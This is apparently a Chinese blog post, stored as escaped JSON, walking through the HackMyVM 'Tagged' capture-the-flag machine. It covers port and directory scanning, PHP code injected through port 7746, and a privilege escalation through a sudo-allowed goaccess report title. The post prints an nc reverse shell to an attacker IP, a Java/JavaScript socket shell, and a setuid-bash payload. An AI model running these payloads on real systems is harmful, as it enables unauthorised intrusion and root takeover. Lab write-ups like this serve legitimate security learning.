\n<\/div><\/p>\n\nGoAccess<\/strong>\u662f\u4e00\u4e2a\u5f00\u6e90\u5b9e\u65f6**<\/strong>Web \u65e5\u5fd7\u5206\u6790\u5668*\u548c\u4ea4\u4e92\u5f0f\u67e5\u770b\u5668\uff0c\u53ef\u5728 <\/em>nix \u7cfb\u7edf\u7684\u7ec8\u7aef\u4e2d\u6216\u901a\u8fc7**<\/strong>\u6d4f\u89c8\u5668**\u8fd0\u884c\u3002<\/p>\n\u5b83\u4e3a\u9700\u8981\u52a8\u6001\u53ef\u89c6\u5316\u670d\u52a1\u5668\u62a5\u544a\u7684\u7cfb\u7edf\u7ba1\u7406\u5458 \u63d0\u4f9b\u5feb\u901f\u4e14\u6709\u4ef7\u503c\u7684 HTTP \u7edf\u8ba1\u4fe1\u606f\u3002<\/strong><\/p>\n<\/blockquote>\n\u5c31\u662f\u67e5\u770b\u65e5\u5fd7\u7684\uff0c\u770b\u4e00\u4e0b\u6709\u65e0payload\uff0c\u4f46\u662f\u6ca1\u6709\u627e\u5230\uff1a<\/p>\n
shyla@tagged:~$ \/usr\/bin\/goaccess -h\n\/usr\/bin\/goaccess -h\n\/usr\/bin\/goaccess -h\nGoAccess - 1.4\nUsage: goaccess [filename] [ options ... ] [-c][-M][-H][-S][-q][-d][...]\nThe following options can also be supplied to the command:\n\nLOG & DATE FORMAT OPTIONS\n --date-format=<dateformat> - Specify log date format. e.g., %d\/%b\/%Y\n --log-format=<logformat> - Specify log format. Inner quotes need escaping, or use single quotes.\n --time-format=<timeformat> - Specify log time format. e.g., %H:%M:%S\n\nUSER INTERFACE OPTIONS\n -c --config-dialog - Prompt log\/date\/time configuration window.\n -i --hl-header - Color highlight active panel.\n -m --with-mouse - Enable mouse support on main dashboard.\n --color=<fg:bg[attrs, PANEL]> - Specify custom colors. See manpage for more details.\n --color-scheme=<1|2|3> - Schemes: 1 => Grey, 2 => Green, 3 => Monokai.\n --html-custom-css=<path.css> - Specify a custom CSS file in the HTML report.\n --html-custom-js=<path.js> - Specify a custom JS file in the HTML report.\n --html-prefs=<json_obj> - Set default HTML report preferences.\n --html-report-title=<title> - Set HTML report page title and header.\n --json-pretty-print - Format JSON output w\/ tabs & newlines.\n --max-items - Maximum number of items to show per panel. See man page for limits.\n --no-color - Disable colored output.\n --no-column-names - Don't write column names in term output.\n --no-csv-summary - Disable summary metrics on the CSV output.\n --no-html-last-updated - Hide HTML last updated field.\n --no-parsing-spinner - Disable progress metrics and parsing spinner.\n --no-progress - Disable progress metrics.\n --no-tab-scroll - Disable scrolling through panels on TAB.\n\nSERVER OPTIONS\n --addr=<addr> - Specify IP address to bind server to.\n --daemonize - Run as daemon (if --real-time-html enabled).\n --fifo-in=<path> - Path to read named pipe (FIFO).\n --fifo-out=<path> - Path to write named pipe (FIFO).\n --origin=<addr> - Ensure clients send this origin header upon the WebSocket handshake.\n --pid-file=<path> - Write PID to a file when --daemonize is used.\n --port=<port> - Specify the port to use.\n --real-time-html - Enable real-time HTML output.\n --ssl-cert=<cert.crt> - Path to TLS\/SSL certificate.\n --ssl-key=<priv.key> - Path to TLS\/SSL private key.\n --user-name=<username> - Run as the specified user.\n --ws-url=<url> - URL to which the WebSocket server responds.\n\nFILE OPTIONS\n - - The log file to parse is read from stdin.\n -f --log-file=<filename> - Path to input log file.\n -l --debug-file=<filename> - Send all debug messages to the specified file.\n -p --config-file=<filename> - Custom configuration file.\n -S --log-size=<number> - Specify the log size, useful when piping in logs.\n --invalid-requests=<filename> - Log invalid requests to the specified file.\n --no-global-config - Don't load global configuration file.\n\nPARSE OPTIONS\n -a --agent-list - Enable a list of user-agents by host.\n -b --browsers-file=<path> - Use additional custom list of browsers.\n -d --with-output-resolver - Enable IP resolver on HTML|JSON output.\n -e --exclude-ip=<IP> - Exclude one or multiple IPv4\/6. Allows IP ranges\n e.g. 192.168.0.1-192.168.0.10\n -H --http-protocol=<yes|no> - Set\/unset HTTP request protocol if found.\n -M --http-method=<yes|no> - Set\/unset HTTP request method if found.\n -o --output=file.html|json|csv - Output either an HTML, JSON or a CSV file.\n -q --no-query-string - Strip request's query string. This can decrease memory consumption.\n -r --no-term-resolver - Disable IP resolver on terminal output.\n --444-as-404 - Treat non-standard status code 444 as 404.\n --4xx-to-unique-count - Add 4xx client errors to the unique visitors count.\n --all-static-files - Include static files with a query string.\n --anonymize-ip - Anonymize IP addresses before outputting to report.\n --crawlers-only - Parse and display only crawlers.\n --date-spec=<date|hr> - Date specificity. Possible values: `date` (default), or `hr`.\n --double-decode - Decode double-encoded values.\n --enable-panel=<PANEL> - Enable parsing\/displaying the given panel.\n --hide-referer=<NEEDLE> - Hide a referer but still count it. Wild cards are allowed.\n i.e., *.bing.com\n --hour-spec=<hr|min> - Hour specificity. Possible values: `hr` (default),\n or `min` (tenth of a min).\n --ignore-crawlers - Ignore crawlers.\n --ignore-panel=<PANEL> - Ignore parsing\/displaying the given panel.\n --ignore-referer=<NEEDLE> - Ignore a referer from being counted. Wild cards are allowed.\n i.e., *.bing.com\n --ignore-statics=<req|panel> - Ignore static requests.\n req => Ignore from valid requests.\n panel => Ignore from valid requests and panels.\n --ignore-status=<CODE> - Ignore parsing the given status code.\n --keep-last=<NDAYS> - Keep the last NDAYS in storage.\n --num-tests=<number> - Number of lines to test. >= 0 (10 default)\n --persist - Persist data to disk on exit to the given --db-path or to \/tmp.\n --process-and-exit - Parse log and exit without outputting data.\n --real-os - Display real OS names. e.g, Windows XP, Snow Leopard.\n --restore - Restore data from disk from the given --db-path or from \/tmp.\n --sort-panel=PANEL,METRIC,ORDER - Sort panel on initial load. e.g., --sort-panel=VISITORS,BY_HITS,ASC.\n See manpage for a list of panels\/fields.\n --static-file=<extension> - Add static file extension. e.g.: .mp3. Extensions are case sensitive.\n\nGEOIP OPTIONS\n --geoip-database=<path> - Specify path to GeoIP database file.\n i.e., GeoLiteCity.dat, GeoIPv6.dat ...\nOTHER OPTIONS\n -h --help - This help.\n -s --storage - Display current storage method. e.g., Hash.\n -V --version - Display version information and exit.\n --dcf - Display the path of the default config file when `-p` is not used.\nExamples can be found by running `man goaccess`.\nFor more details visit: http:\/\/goaccess.io\nGoAccess Copyright (C) 2009-2017 by Gerardo Orellana<\/code><\/pre>\n\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
shyla@tagged:\/tmp$ touch exp.log\ntouch exp.log\ntouch exp.log\nshyla@tagged:\/tmp$ sudo -l\nsudo -l\nsudo -l\nMatching Defaults entries for shyla on tagged:\n env_reset, mail_badpass,\n secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser shyla may run the following commands on tagged:\n (uma) NOPASSWD: \/usr\/bin\/goaccess\n (ALL) NOPASSWD: \/usr\/bin\/php \/var\/www\/html\/report.php\nshyla@tagged:\/tmp$ sudo -u uma \/usr\/bin\/goaccess -f exp.log -o \/var\/www\/html\/report.html\nsudo -u uma \/usr\/bin\/goaccess -f exp.log -o \/var\/www\/html\/report.html\n<in\/goaccess -f exp.log -o \/var\/www\/html\/report.html\n\nshyla@tagged:\/tmp$ head \/var\/www\/html\/report.php \nhead \/var\/www\/html\/report.php\nhead \/var\/www\/html\/report.php\n<!DOCTYPE html><html lang='es'><head><meta charset='UTF-8'><meta name='referrer' content='no-referrer'><meta http-equiv='X-UA-Compatible' content='IE=edge'><meta name='google' content='notranslate'><meta name='viewport' content='width=device-width, initial-scale=1'><meta name='robots' content='noindex, nofollow'><link rel='icon' href='data:image\/x-icon;base64,AAABAAEAEBAQAAEABAAoAQAAFgAAACgAAAAQAAAAIAAAAAEABAAAAAAAgAAAAAAAAAAAAAAAEAAAAAAAAADGxsYAWFhYABwcHABfAP8A\/9dfAADXrwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIiIiIiIiIiIjMlUkQgAiIiIiIiIiIiIiIzJVJEIAAAIiIiIiIiIiIiMyVSRCAAIiIiIiIiIiIiIRERERERERERERERERERERIiIiIiIiIiIgACVVUiIiIiIiIiIiIiIiIAAlVVIiIiIiIiIiIiIiIhEREREREREREREREREREREAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' type='image\/x-icon' \/><title>Estadisticas de Servidor<\/title><style>@font-face {font-family: 'fa';src: url(data:application\/font-woff;charset=utf-8;base64,d09GRgABAAAAAC2sAAsAAAAALWAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAABPUy8yAAABCAAAAGAAAABgDxIPHGNtYXAAAAFoAAABbAAAAWzzYPN8Z2FzcAAAAtQAAAAIAAAACAAAABBnbHlmAAAC3AAAJ7QAACe0PqRPf2hlYWQAACqQAAAANgAAADYSBhrHaGhlYQAAKsgAAAAkAAAAJAhUBIZobXR4AAAq7AAAAMwAAADMpCoCC2xvY2EAACu4AAAAaAAAAGjyrvuebWF4cAAALCAAAAAgAAAAIAA+AVduYW1lAAAsQAAAAUoAAAFKIhW<\/code><\/pre>\n\u590d\u5236\u4e0b\u6765\u67e5\u770b\u4e00\u4e0b\u662f\u5565\uff1a<\/p>\n
<\/div><\/p>\n\u662f\u4ed6\u751f\u6210\u7684\u65e5\u5fd7\u6587\u6863\uff01\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n
sudo -u uma \/usr\/bin\/goaccess -f exp.log -o \/var\/www\/html\/report.html --html-custom-js=exp.js\nsudo \/usr\/bin\/php \/var\/www\/html\/report.php\n# \u5931\u8d25\nsudo -u uma \/usr\/bin\/goaccess -f exp.log -o \/var\/www\/html\/report.html --html-report-title="<?php system('chmod +s \/bin\/bash');?>"\nsudo \/usr\/bin\/php \/var\/www\/html\/report.php\n# \u6210\u529f<\/code><\/pre>\n.....\non (_) {if (!arguments.length) return yValue1;yValue1 = _;return chart;};return chart;}<\/script><script src='exp.js'><\/script><\/body><\/html>shyla@tagged:\/tmp$ whoami;id\nwhoami;id\nwhoami;id\nshyla\nuid=1001(shyla) gid=1001(shyla) grupos=1001(shyla)\nshyla@tagged:\/tmp$ sudo -u uma \/usr\/bin\/goaccess -f exp.log -o \/var\/www\/html\/report.html --html-report-title="<?php system('chmod +s \/bin\/bash');?>"\nsudo -u uma \/usr\/bin\/goaccess -f exp.log -o \/var\/www\/html\/report.html --html-report-title="<?php system('chmod +s \/bin\/bash');?>"\n<eport-title="<?php system('chmod +s \/bin\/bash');?>"\n\nshyla@tagged:\/tmp$ sudo \/usr\/bin\/php \/var\/www\/html\/report.php\nsudo \/usr\/bin\/php \/var\/www\/html\/report.php\nsudo \/usr\/bin\/php \/var\/www\/html\/report.php\n.....\nreturn chart;};chart.y1 = function (_) {if (!arguments.length) return yValue1;yValue1 = _;return chart;};return chart;}<\/script><\/body><\/html>shyla@tagged:\/tmp$ ls -l \/bin\/bash\nls -l \/bin\/bash\nls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1234376 mar 27 2022 \/bin\/bash\nshyla@tagged:\/tmp$ bash -p\nbash -p\nbash -p\nbash-5.1# whoami;id\nwhoami;id\nwhoami;id\nroot\nuid=1001(shyla) gid=1001(shyla) euid=0(root) egid=0(root) grupos=0(root),1001(shyla)\nbash-5.1# cd \/root;ls -la\ncd \/root;ls -la\ncd \/root;ls -la\ntotal 32\ndrwx------ 4 root root 4096 nov 14 2022 .\ndrwxr-xr-x 18 root root 4096 nov 14 2022 ..\nlrwxrwxrwx 1 root root 9 nov 14 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 571 abr 10 2021 .bashrc\ndrwxr-xr-x 3 root root 4096 nov 14 2022 .cache\ndrwxr-xr-x 3 root root 4096 nov 14 2022 .local\n-rw-r--r-- 1 root root 161 jul 9 2019 .profile\n-rw------- 1 root root 12 nov 14 2022 root.txt\n-rw-r--r-- 1 root root 161 nov 14 2022 .wget-hsts\nbash-5.1# cat root.txt\ncat root.txt\ncat root.txt\nHMVrep0rtz!<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"Tagged \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172.20.10.4 — -A Open 172 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-546","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/546","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=546"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/546\/revisions"}],"predecessor-version":[{"id":547,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/546\/revisions\/547"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=546"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=546"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=546"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
rustscan -a 172.20.10.4 -- -A<\/code><\/pre>\nOpen 172.20.10.4:80\nOpen 172.20.10.4:7746\n\nPORT STATE SERVICE REASON VERSION\n80\/tcp open http syn-ack nginx 1.18.0\n|_http-title: Site doesn't have a title (text\/html).\n|_http-server-header: nginx\/1.18.0\n| http-methods: \n|_ Supported Methods: GET HEAD\n7746\/tcp open unknown syn-ack\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port7746-TCP:V=7.94SVN%I=7%D=4\/13%Time=661A37AD%P=x86_64-pc-linux-gnu%r\nSF:(NULL,1,">")%r(GenericLines,2,">>")%r(GetRequest,2,">>")%r(HTTPOptions,\nSF:2,">>")%r(RTSPRequest,2,">>")%r(RPCCheck,1,">")%r(DNSVersionBindReqTCP,\nSF:1,">");<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\ngobuster dir -u http:\/\/172.20.10.4 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n\/report.php (Status: 200) [Size: 0]\n\/index.php (Status: 200) [Size: 12582828]<\/code><\/pre>\n\u4e0b\u9762\u627e\u5230dns\u4ee5\u540e\u91cd\u65b0\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n
gobuster dir -u http:\/\/tagged.hmv -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n<\/div><\/p>\n\u5636\u3002\u3002\u3002<\/p>\n
\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.4<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.4\n+ Target Hostname: 172.20.10.4\n+ Target Port: 80\n+ Start Time: 2024-04-13 03:45:24 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: nginx\/1.18.0\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ Multiple index files found: \/index.html, \/index.php.\n+ \/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.\n+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host\n+ End Time: 2024-04-13 03:45:42 (GMT-4) (18 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div><\/p>\n\u6539\u4e00\u4e0bdns\uff1a<\/p>\n
172.20.10.4 tagged.hmv<\/code><\/pre>\n\u91cd\u65b0\u626b\u63cf\u4e00\u4e0b\u653e\u5230\u4e0a\u9762\u53bb\u4e86\u3002<\/p>\n
\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\nhttp:\/\/tagged.hmv\/index.php<\/code><\/pre>\n<\/div><\/p>\n\u8bbf\u95ee\u654f\u611f\u7aef\u53e3<\/h3>\n
<\/div><\/p>\n\u5173\u95ed\u4e86\uff1f\u91cd\u542f\u9776\u673a\u5c1d\u8bd5\u8fde\u63a5\uff0c\u67e5\u4e86\u4e00\u4e0b\u8fd9\u4e2a\u7aef\u53e3\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\nAbout TCP\/UDP ports<\/strong><\/p>\nTCP port 7746<\/strong> uses the Transmission Control Protocol. TCP is one of the main protocols in TCP\/IP networks. TCP is a connection-oriented protocol, it requires handshaking to set up end-to-end communications. Only when a connection is set up user's data can be sent bi-directionally over the connection.
\nAttention! TCP guarantees delivery of data packets on port 7746<\/strong> in the same order in which they were sent. Guaranteed communication over TCP port 7746<\/strong> is the main difference between TCP and UDP. UDP port 7746<\/strong> would not have guaranteed communication as TCP.UDP on port 7746<\/strong> provides an unreliable service and datagrams may arrive duplicated, out of order, or missing without notice. UDP on port 7746<\/strong> thinks that error checking and correction is not necessary or performed in the application, avoiding the overhead of such processing at the network interface level.
\nUDP (User Datagram Protocol) is a minimal message-oriented Transport Layer protocol (protocol is documented in IETF RFC 768).
\nApplication examples that often use UDP: voice over IP (VoIP), streaming media and real-time multiplayer games. Many web applications use UDP, e.g. the Domain Name System (DNS), the Routing Information Protocol (RIP), the Dynamic Host Configuration Protocol (DHCP), the Simple Network Management Protocol (SNMP).
\nTCP vs UDP - TCP: reliable, ordered, heavyweight, streaming; UDP - unreliable, not ordered, lightweight, datagrams.<\/p>\nTCP \u7aef\u53e37746<\/strong>\u4f7f\u7528\u4f20\u8f93\u63a7\u5236\u534f\u8bae\u3002 TCP \u662f TCP\/IP \u7f51\u7edc\u4e2d\u7684\u4e3b\u8981\u534f\u8bae\u4e4b\u4e00\u3002 TCP\u662f\u4e00\u79cd\u9762\u5411\u8fde\u63a5\u7684\u534f\u8bae\uff0c\u5b83\u9700\u8981\u63e1\u624b\u6765\u5efa\u7acb\u7aef\u5230\u7aef\u7684\u901a\u4fe1\u3002\u4ec5\u5f53\u5efa\u7acb\u8fde\u63a5\u65f6\uff0c\u7528\u6237\u6570\u636e\u624d\u80fd\u901a\u8fc7\u8be5\u8fde\u63a5\u53cc\u5411\u53d1\u9001\u3002
\n\u6ce8\u610f\u529b\uff01 TCP \u4fdd\u8bc1\u5728\u7aef\u53e37746<\/strong>\u4e0a\u6309\u7167\u53d1\u9001\u6570\u636e\u5305\u7684\u987a\u5e8f\u4f20\u9001\u6570\u636e\u5305\u3002\u901a\u8fc7 TCP \u7aef\u53e37746<\/strong>\u8fdb\u884c\u6709\u4fdd\u8bc1\u7684\u901a\u4fe1\u662f TCP \u548c UDP \u4e4b\u95f4\u7684\u4e3b\u8981\u533a\u522b\u3002 UDP \u7aef\u53e37746<\/strong>\u65e0\u6cd5\u4fdd\u8bc1\u50cf TCP \u4e00\u6837\u8fdb\u884c\u901a\u4fe1\u3002
\n\u7aef\u53e37746<\/strong>\u4e0a\u7684 UDP\u63d0\u4f9b\u4e0d\u53ef\u9760\u7684\u670d\u52a1\uff0c\u6570\u636e\u62a5\u53ef\u80fd\u4f1a\u91cd\u590d\u5230\u8fbe\u3001\u4e71\u5e8f\u6216\u4e22\u5931\uff0c\u6055\u4e0d\u53e6\u884c\u901a\u77e5\u3002\u7aef\u53e37746<\/strong>\u4e0a\u7684 UDP\u8ba4\u4e3a\u9519\u8bef\u68c0\u67e5\u548c\u7ea0\u6b63\u662f\u4e0d\u5fc5\u8981\u7684\uff0c\u4e5f\u4e0d\u5728\u5e94\u7528\u7a0b\u5e8f\u4e2d\u6267\u884c\uff0c\u4ece\u800c\u907f\u514d\u4e86\u5728\u7f51\u7edc\u63a5\u53e3\u7ea7\u522b\u8fdb\u884c\u6b64\u7c7b\u5904\u7406\u7684\u5f00\u9500\u3002
\nUDP\uff08\u7528\u6237\u6570\u636e\u62a5\u534f\u8bae\uff09\u662f\u4e00\u79cd\u6700\u5c0f\u7684\u9762\u5411\u6d88\u606f\u7684\u4f20\u8f93\u5c42\u534f\u8bae\uff08\u8be5\u534f\u8bae\u8bb0\u5f55\u5728 IETF RFC 768 \u4e2d\uff09\u3002
\n\u7ecf\u5e38\u4f7f\u7528 UDP \u7684\u5e94\u7528\u793a\u4f8b\uff1aIP \u8bed\u97f3 (VoIP)\u3001\u6d41\u5a92\u4f53\u548c\u5b9e\u65f6\u591a\u4eba\u6e38\u620f\u3002\u8bb8\u591aWeb\u5e94\u7528\u7a0b\u5e8f\u4f7f\u7528UDP\uff0c\u4f8b\u5982\u57df\u540d\u7cfb\u7edf(DNS)\u3001\u8def\u7531\u4fe1\u606f\u534f\u8bae(RIP)\u3001\u52a8\u6001\u4e3b\u673a\u914d\u7f6e\u534f\u8bae(DHCP)\u3001\u7b80\u5355\u7f51\u7edc\u7ba1\u7406\u534f\u8bae(SNMP)\u3002
\nTCP \u4e0e UDP - TCP\uff1a\u53ef\u9760\u3001\u6709\u5e8f\u3001\u91cd\u91cf\u7ea7\u3001\u6d41\u5f0f\u4f20\u8f93\uff1b UDP - \u4e0d\u53ef\u9760\u3001\u65e0\u5e8f\u3001\u8f7b\u91cf\u7ea7\u6570\u636e\u62a5\u3002<\/p>\n<\/blockquote>\n\u8bf4\u4eba\u8bdd\u5c31\u662f\u53d1\u9001\u6570\u636e\u7684\u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b\uff0c\u6ca1\u6709\u56de\u663e\u4e0d\u77e5\u9053\u662f\u5565\uff0c\u5c1d\u8bd5\u4f7f\u7528< ><\/code>\u5305\u88f9\u547d\u4ee4\uff0c\u4f46\u662f\u6267\u884c\u4e0d\u4e86\u53cd\u5f39shell\uff0c\u91cd\u65b0\u5bfc\u5165\u9776\u673a\uff1a<\/p>\n<\/div><\/p>\n\u5c1d\u8bd5\u8f93\u5165test\uff0c\u53d1\u73b0\u5b58\u5728\u56de\u663e\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Tagged]\n\u2514\u2500$ nc 172.20.10.9 7746\n>test\n><\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ curl http:\/\/172.20.10.9\/index.php\n<h1>TAGZ<\/h1>\n<pre>test<\/pre><\/code><\/pre>\n\u6240\u4ee5\u5b83\u662f\u653e\u5728<pre><\/code>\u6807\u7b7e\u5185\u7684\uff0c\u5c1d\u8bd5\u6267\u884c\u53cd\u5f39shell\uff01\uff01\uff01<\/p>\n<\/div><\/p>\nString command = "var host = '172.20.10.8';" +\n "var port = 1234;" +\n "var cmd = '\/bin\/bash';"+\n "var s = new java.net.Socket(host, port);" +\n "var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();"+\n "var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();"+\n "var po = p.getOutputStream(), so = s.getOutputStream();"+\n "print ('Connected');"+\n "while (!s.isClosed()) {"+\n " while (pi.available() > 0)"+\n " so.write(pi.read());"+\n " while (pe.available() > 0)"+\n " so.write(pe.read());"+\n " while (si.available() > 0)"+\n " po.write(si.read());"+\n " so.flush();"+\n " po.flush();"+\n " java.lang.Thread.sleep(50);"+\n " try {"+\n " p.exitValue();"+\n " break;"+\n " }"+\n " catch (e) {"+\n " }"+\n "}"+\n "p.destroy();"+\n "s.close();";\nString x = "\\"\\".getClass().forName(\\"javax.script.ScriptEngineManager\\").newInstance().getEngineByName(\\"JavaScript\\").eval(\\""+command+"\\")";\nref.add(new StringRefAddr("x", x);<\/code><\/pre>\n\u592a\u957f\u4e86\uff0c\u5c1d\u8bd5\u6267\u884cphp\u4ee3\u7801\uff1a<\/p>\n
<?php system('nc -e \/bin\/bash 172.20.10.8 1234');?><\/code><\/pre>\n<\/div>
\n<\/div>
\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@tagged:\/var\/www\/html$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@tagged:\/var\/www\/html$ ls -la\ntotal 20\ndrwxr-xr-x 2 root root 4096 Nov 14 2022 .\ndrwxr-xr-x 3 root root 4096 Nov 14 2022 ..\n-rw-r--r-- 1 root root 46 Nov 14 2022 index.html\n-rwxrwxr-- 1 www-data shyla 93 Apr 13 10:38 index.php\n-rw-r--r-- 1 root root 982 Nov 14 2022 magiccode.go\nlrwxrwxrwx 1 root root 24 Nov 14 2022 report.html -> \/var\/www\/html\/report.php\n-rwxrwxr-- 1 uma uma 0 Nov 14 2022 report.php\n(remote) www-data@tagged:\/var\/www\/html$ cd ..\/;ls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 Nov 14 2022 .\ndrwxr-xr-x 12 root root 4096 Nov 14 2022 ..\ndrwxr-xr-x 2 root root 4096 Nov 14 2022 html\n(remote) www-data@tagged:\/var\/www$ cd ..;ls -la\ntotal 48\ndrwxr-xr-x 12 root root 4096 Nov 14 2022 .\ndrwxr-xr-x 18 root root 4096 Nov 14 2022 ..\ndrwxr-xr-x 2 root root 4096 Sep 3 2022 backups\ndrwxr-xr-x 9 root root 4096 Nov 14 2022 cache\ndrwxr-xr-x 25 root root 4096 Nov 14 2022 lib\ndrwxrwsr-x 2 root staff 4096 Sep 3 2022 local\nlrwxrwxrwx 1 root root 9 Nov 14 2022 lock -> \/run\/lock\ndrwxr-xr-x 7 root root 4096 Nov 14 2022 log\ndrwxrwsr-x 2 root mail 4096 Nov 14 2022 mail\ndrwxr-xr-x 2 root root 4096 Nov 14 2022 opt\nlrwxrwxrwx 1 root root 4 Nov 14 2022 run -> \/run\ndrwxr-xr-x 4 root root 4096 Nov 14 2022 spool\ndrwxrwxrwt 4 root root 4096 Apr 13 10:39 tmp\ndrwxr-xr-x 3 root root 4096 Nov 14 2022 www\n(remote) www-data@tagged:\/var$ mail\nbash: mail: command not found\n(remote) www-data@tagged:\/var$ cd backups\/\n(remote) www-data@tagged:\/var\/backups$ ls -la\ntotal 8\ndrwxr-xr-x 2 root root 4096 Sep 3 2022 .\ndrwxr-xr-x 12 root root 4096 Nov 14 2022 ..\n(remote) www-data@tagged:\/var\/backups$ cd \/home\n(remote) www-data@tagged:\/home$ ls -la\ntotal 16\ndrwxr-xr-x 4 root root 4096 Nov 14 2022 .\ndrwxr-xr-x 18 root root 4096 Nov 14 2022 ..\ndrwxr-xr-x 3 shyla shyla 4096 Nov 14 2022 shyla\ndrwxr-xr-x 2 uma uma 4096 Nov 14 2022 uma\n(remote) www-data@tagged:\/home$ cd uma\n(remote) www-data@tagged:\/home\/uma$ ls -la\ntotal 24\ndrwxr-xr-x 2 uma uma 4096 Nov 14 2022 .\ndrwxr-xr-x 4 root root 4096 Nov 14 2022 ..\n-rw------- 1 uma uma 52 Nov 14 2022 .Xauthority\nlrwxrwxrwx 1 uma uma 9 Nov 14 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 uma uma 220 Nov 14 2022 .bash_logout\n-rw-r--r-- 1 uma uma 3526 Nov 14 2022 .bashrc\n-rw-r--r-- 1 uma uma 807 Nov 14 2022 .profile\n(remote) www-data@tagged:\/home\/uma$ cd ..\/shyla\/\n(remote) www-data@tagged:\/home\/shyla$ ls -la\ntotal 2856\ndrwxr-xr-x 3 shyla shyla 4096 Nov 14 2022 .\ndrwxr-xr-x 4 root root 4096 Nov 14 2022 ..\nlrwxrwxrwx 1 shyla shyla 9 Nov 14 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 shyla shyla 220 Nov 14 2022 .bash_logout\n-rw-r--r-- 1 shyla shyla 3526 Nov 14 2022 .bashrc\ndrwxr-xr-x 3 shyla shyla 4096 Nov 14 2022 .local\n-rw-r--r-- 1 shyla shyla 807 Nov 14 2022 .profile\n-rw-r--r-- 1 shyla shyla 66 Nov 14 2022 .selected_editor\n-rwxr-xr-x 1 shyla shyla 2887781 Nov 14 2022 magiccode\n-rw------- 1 shyla shyla 13 Nov 14 2022 user.txt\n(remote) www-data@tagged:\/home\/shyla$ file magiccode \nmagiccode: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, Go BuildID=64S6_nwugG3_G5eg4W47\/N9jZMz6Tf8jSquz3zHWZ\/m2G1xxhQAmuoXQo5mOBM\/6EluGNnXWpMQ6kk7GEnO, with debug_info, not stripped\n(remote) www-data@tagged:\/home\/shyla$ \n(local) pwncat$ lpwd\n\/home\/kali\/temp\/Tagged\n(local) pwncat$ 